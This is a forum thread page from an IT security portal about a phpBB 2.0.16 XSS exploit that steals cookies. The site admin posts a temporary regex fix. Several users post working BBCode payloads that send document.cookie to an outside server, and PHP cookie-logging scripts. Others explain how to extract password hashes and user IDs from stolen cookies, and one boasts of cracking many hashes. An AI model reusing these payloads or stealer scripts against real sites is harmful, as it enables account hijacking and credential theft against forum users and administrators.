Waraxe IT Security Portal
Login or Register
November 22, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 54
Members: 0
Total: 54
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit Goto page Previous1, 2, 3, 4, 5, 6, 7, 8Next
Post new topicReply to topic View previous topic :: View next topic
PostPosted: Sun Jul 10, 2005 5:57 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




WaterBird wrote:
Btw any idea how to fix this hole ? Phpbb don't know about it yet ?


Ok, look at "includes/bbcode.php", function "bbencode_second_pass()":

Code:

// matches a [url]xxxx://www.phpbb.com[/url] code..
$patterns[] = "#\[url\]([\w]+?://[^ \"\n\r\t<]*?)\[/url\]#is";
$replacements[] = $bbcode_tpl['url1'];

// [url]www.phpbb.com[/url] code.. (no xxxx:// prefix).
$patterns[] = "#\[url\]((www|ftp)\.[^ \"\n\r\t<]*?)\[/url\]#is";
$replacements[] = $bbcode_tpl['url2'];

// [url=xxxx://www.phpbb.com]phpBB[/url] code..
$patterns[] = "#\[url=([\w]+?://[^ \"\n\r\t<]*?)\]([^?\n\r\t].*?)\[/url\]#is";
$replacements[] = $bbcode_tpl['url3'];

// [url=www.phpbb.com]phpBB[/url] code.. (no xxxx:// prefix).
$patterns[] = "#\[url=((www|ftp)\.[^ \"\n\r\t<]*?)\]([^?\n\r\t].*?)\[/url\]#is";
$replacements[] = $bbcode_tpl['url4'];



Now, you must improve those regexes, like:

Code:

[^ \"\n\r\t<]


Add there some more "dangerous" chars, like :

Code:

[^ \"\n\r\t\'\`\[\]<]


This is primitive and temporal patch, but it seems to work righ now.
When phpBB developers will release their own patch, i suggest to use that one Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Jul 10, 2005 6:19 pm Reply with quote
WaterBird
Active user
Active user
Joined: May 16, 2005
Posts: 37




Thank You :}
View user's profile Send private message
cookie to pass
PostPosted: Sun Jul 10, 2005 8:22 pm Reply with quote
mimdrj
Beginner
Beginner
Joined: Jul 10, 2005
Posts: 1




i got cookies but i reallydon't know hoe to get pass from cookies please help it is too important for me thnks
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 8:52 pm Reply with quote
diaga
Regular user
Regular user
Joined: Jun 27, 2005
Posts: 22




works fine for me =]

By using a short domain (I'm using 3 char), you could even fit it into a signature =]
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 10:12 pm Reply with quote
g30rg3_x
Active user
Active user
Joined: Jan 23, 2005
Posts: 31
Location: OutSide Of The PE




Shocked

just a few hours and post get 33 post Laughing

yeah, i have to re read all the post, and i answer some questions that i see and this has not been correctly answered...

another bbcode flaw combination with Social engineering ,I think *_^

yeah it requires a social engineering, for grabing the most value cookie
who is the admin cookie Wink

sorry but i dont understand what do you mean only work on IE

yeah i know its too late, but this poc just execute on IE,
and excellent short video... Wink

by the way, g30rg3_x, did you manage to use this exploit ?

nop, i just remenber all you guys that this exploit its not officially patched, but our webmaster have been launch a unofficial but working patch Wink

Cookie Stealer Code...
mmm, i use this:
Code:

<?php
$cookie = $_GET['cookie'];
$fff = fopen("cookie.txt","a+");
fwrite($fff, "$cookie \n");
fclose($fff);
?>


jpg/txt/gif cookie stealer...

this doesnt exist they use a .txt or .jpg or .bmp or whatever, why???
this is simply if you put php this will execute in your server side, so if you put in .txt or whatever this "bad cookie stealer code" would be injected in the website and not include thats the real thing, thats happens and because are use .xxx extensions

i got cookies but i reallydon't know hoe to get pass from cookies please help it is too important for me thnks

as you see, you would get something like:
Code:

phpbb2mysql_t=a:2:{i:1;i:1121004937;i:2;i:1121005196;};
phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"c2150783216c11afea291d179e7b1902";s:6:"userid";i:666;}; phpbb2mysql_sid=b57ae9f7898f1ccebf7e07fa427e5998


the part you need its:
phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"c2150783216c11afea291d179e7b1902";s:6:"userid";i:666;};

every information has a work, like the
c2150783216c11afea291d179e7b1902
its the hash of thepassword of the user that you steal his cookie...

"userid";i:666;
you can view this as:
userid: 666

so, now you sure ask, and what user its this, simply see his profile
http://www.theexploitedsite.com/forum/profile.php?mode=viewprofile&u=x

where the value x on u its the userid so in this case:
http://www.theexploitedsite.com/forum/profile.php?mode=viewprofile&u=666
and now you will see what user is Wink

sorry for the too late answers, but this topic moves so fast Razz
Laughing

regards


Last edited by g30rg3_x on Mon Jul 11, 2005 7:03 pm; edited 2 times in total
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Mon Jul 11, 2005 6:27 pm Reply with quote
KingOfSka
Advanced user
Advanced user
Joined: Mar 13, 2005
Posts: 61




i tested locally and in some test forum, the exploit is working (i used a mine cookie stealer file) but i used mod rewrite to have a .png file to be processed as php, but the only problem is that it seems to work only in the body part of a post, and not in pm...
View user's profile Send private message Visit poster's website
PostPosted: Mon Jul 11, 2005 7:56 pm Reply with quote
700G
Active user
Active user
Joined: Mar 25, 2005
Posts: 33




I havent tired it in a PM yet, but it definitely works as a signature too Very Happy
View user's profile Send private message
PostPosted: Tue Jul 12, 2005 9:44 am Reply with quote
KingOfSka
Advanced user
Advanced user
Joined: Mar 13, 2005
Posts: 61




verbatim wrote:

any ideas ?is there a mistake here :
Code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite.com/cookie.php'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

finally, did you manage to use this exploit with a personnal stealer script ?

(i know, a lot of question, but i guess it may help other readers Wink)

yes there's an error Very Happy it should be /cookie.php?var='+document.cookie , where var is the name of the variable that should store the cookie
View user's profile Send private message Visit poster's website
PostPosted: Wed Jul 13, 2005 3:11 am Reply with quote
theOne
Regular user
Regular user
Joined: May 31, 2005
Posts: 8




How would you go abouts doing it like they'r edoing at anticaht? using jpg and still getting info?
View user's profile Send private message
PostPosted: Wed Jul 13, 2005 5:55 am Reply with quote
700G
Active user
Active user
Joined: Mar 25, 2005
Posts: 33




Herer is what exactly is working for me:



Code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://site.com/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


and i am using this script:

Code:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: /redirectpage.html");
?>


working very well. I have a long list of cracked MD5's using Cain and rainbow tables Very Happy
View user's profile Send private message
PostPosted: Wed Jul 13, 2005 11:54 am Reply with quote
_daemon_
Beginner
Beginner
Joined: Jul 13, 2005
Posts: 4
Location: Greece




Hey there, thats great info! Congrats. I'd like to ask a question: Why cant this work on firefox? Its ok with IE but many people use ff, opera, etc. nowdays. Thanks a bunch
View user's profile Send private message Send e-mail MSN Messenger
PostPosted: Wed Jul 13, 2005 12:42 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




_daemon_ wrote:
Hey there, thats great info! Congrats. I'd like to ask a question: Why cant this work on firefox? Its ok with IE but many people use ff, opera, etc. nowdays. Thanks a bunch


Maybe because IE is less restrictive on some rules, like using of the various quotes. I mean, firefox will not accept " ` " character as substitute of the single or double quote.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jul 13, 2005 9:35 pm Reply with quote
g30rg3_x
Active user
Active user
Joined: Jan 23, 2005
Posts: 31
Location: OutSide Of The PE




in the original advisory in russian
( http://antichat.ru/txt/phpbb/ )

says that this exploits works because, IE takes ` at his equivalent " so thats for only execute in IE and not with others engines..
Quote:

....
Pay attention to a symbol `. It not ', but in this case is perceived Internet Explorer'ii as its equivalent. Here result:



regards
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Thu Jul 14, 2005 12:09 am Reply with quote
Slobo
Beginner
Beginner
Joined: Jul 14, 2005
Posts: 2




What if the admin control panel is password protected, how should the cookie be edited to login automatically in the admin area?
View user's profile Send private message
PostPosted: Thu Jul 14, 2005 8:06 am Reply with quote
KingOfSka
Advanced user
Advanced user
Joined: Mar 13, 2005
Posts: 61




sometimes you simply can't, there are some mod that require the admin to inserti his password to log in the admin panel, regardless cookies, so you have to crack it
View user's profile Send private message Visit poster's website
phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 3 of 8
Goto page Previous1, 2, 3, 4, 5, 6, 7, 8Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.037 Seconds